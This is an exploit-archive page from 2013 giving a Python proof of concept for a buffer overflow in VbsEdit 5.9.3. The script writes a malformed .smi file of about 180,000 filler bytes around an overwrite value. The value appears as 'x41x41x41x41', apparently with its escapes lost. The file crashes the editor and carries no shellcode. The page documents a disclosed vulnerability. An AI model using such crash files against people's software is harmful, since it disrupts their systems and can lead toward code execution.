[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : VbsEdit 5.9.3 (.smi) - Buffer Overflow Vulnerability
# Published : 2013-07-22
# Author :
# Previous Title : Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
# Next Title : Opera 12.15 vtable Corruption


# Exploit Title: VbsEdit 5.9.3(.smi file handling) Buffer overflow vulnerability
# Date: 22.7.2013
# Exploit Author: d3b4g
# Vendor Homepage:http://www.vbsedit.com/
# Software Link: http://www.vbsedit.com/
# Tested on: Windows XP SP3
# Twitter: @schaba



#!/usr/bin/python
# Tested on: win XPsp3
chars = "A"*90000
crush = "x41x41x41x41"
file=open('exp.smi','w')
file.write(chars+crush+chars)
file.close()